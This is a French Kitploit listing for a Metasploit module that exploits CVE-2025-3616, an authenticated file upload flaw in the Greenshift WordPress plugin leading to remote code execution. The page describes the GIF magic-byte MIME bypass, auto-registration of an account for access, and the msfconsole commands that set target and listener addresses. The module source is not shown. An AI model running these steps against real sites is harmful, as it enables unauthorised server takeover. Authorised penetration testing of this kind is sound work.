Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3616 | Kitploit
Outils/GitHubGitHub/b4d-53ct0r/cve-2025-3616
Frameworks d'ExploitationAnalyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionAuthentificationDéveloppement de Charges Utiles
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Voir le dépôt
il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Module Metasploit : Téléversement de fichier arbitraire dans le plugin WordPress Greenshift (CVE-2025-3616)

Ce dépôt contient un module Metasploit pour exploiter CVE-2025-3616, une vulnérabilité de téléversement de fichier arbitraire dans le plugin WordPress Greenshift (versions 11.4 à 11.4.5).

L'exploit permet aux utilisateurs authentifiés (Subscriber+) de téléverser des fichiers arbitraires, menant à une exécution de code à distance (RCE). Il contourne la validation du type de fichier du plugin en usurpant le type MIME à l'aide d'octets magiques GIF (GIF89a;).

Fonctionnalités

  • Gestion de l'authentification : prend en charge la connexion avec des identifiants existants (USERNAME/PASSWORD).
  • Auto-inscription : inclut une option REGISTER pour inscrire automatiquement un nouvel utilisateur et exploiter la vulnérabilité à l'aide des nouveaux cookies de session (utile si l'inscription est activée sur la cible).
  • Extraction de nonce : récupère automatiquement le nonce wp_rest requis depuis le tableau de bord d'administration.
  • Contournement de sécurité : préfixe le payload PHP avec des octets magiques GIF pour contourner la vérification de finfo_file().

Installation

  1. Assurez-vous d'avoir Metasploit Framework installé.

  2. Copiez wp_greenshift_file_upload.rb dans votre répertoire de modules local :

    root@kitploit:~
    mkdir -p ~/.msf4/modules/exploits/unix/webapp/
    cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
    
  3. Démarrez msfconsole et rechargez les modules :

    root@kitploit:~
    msfconsole
    msf6 > reload_all
    

Utilisation

1. Utilisation de l'auto-inscription (recommandé)

Si l'inscription des utilisateurs est activée sur la cible, vous n'avez pas besoin d'identifiants.

root@kitploit:~
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run

2. Utilisation d'identifiants existants

Si vous disposez déjà d'un utilisateur valide (Subscriber ou supérieur) :

root@kitploit:~
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run

Options

Avertissement

Ce module est destiné uniquement à des fins éducatives et à des tests d'intrusion autorisés. L'utilisation de ce code pour attaquer des cibles sans consentement mutuel préalable est illégale.

Télécharger l’outil
OptionRequisDescription
RHOSTSouiL'adresse de la cible
LHOSTouiL'adresse d'écoute (votre IP)
REGISTERnonDéfinissez sur true pour inscrire automatiquement un nouveau compte (par défaut : false)
USERNAMEnonNom d'utilisateur WordPress (requis si REGISTER est false)
PASSWORDnonMot de passe WordPress (requis si REGISTER est false)
EMAILnonE-mail pour l'inscription (facultatif, généré automatiquement si vide)